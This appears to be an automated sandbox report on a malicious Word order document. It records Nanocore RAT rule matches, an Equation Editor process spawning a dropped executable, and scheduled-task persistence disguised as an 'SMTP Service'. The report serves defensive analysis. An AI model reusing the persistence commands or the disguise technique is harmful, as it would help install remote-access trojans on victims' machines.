Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.cat464923.exe.22a4dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.22a4dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.24aeb3c.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.24aeb3c.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: catx[1].exe.2.dr, Form1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: smtpsvc.exe.5.dr, Form1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@26/14@47/2

Source: C:\Users\user\AppData\Roaming\cat464923.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$W ORDER Ref PO-298721.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cat464923.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{f9198f9a-66a7-4bba-ab1c-dff8091cd717}

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC580.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ..................#...............#.....(.P.....................P.......>u......................................................................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................P.......................(.P.....L.......d.......t.......Xw......................................................................

Source: C:\Users\user\AppData\Roaming\cat464923.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cat464923.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: NEW ORDER Ref PO-298721.doc	Virustotal: Detection: 23%
Source: NEW ORDER Ref PO-298721.doc	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {C1636649-2706-44BF-BD6B-15CC427FB25D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe 0
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe 0
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: C:\Users\user\AppData\Roaming\cat464923.exe	Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}

Source: C:\Users\user\AppData\Roaming\cat464923.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\cat464923.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

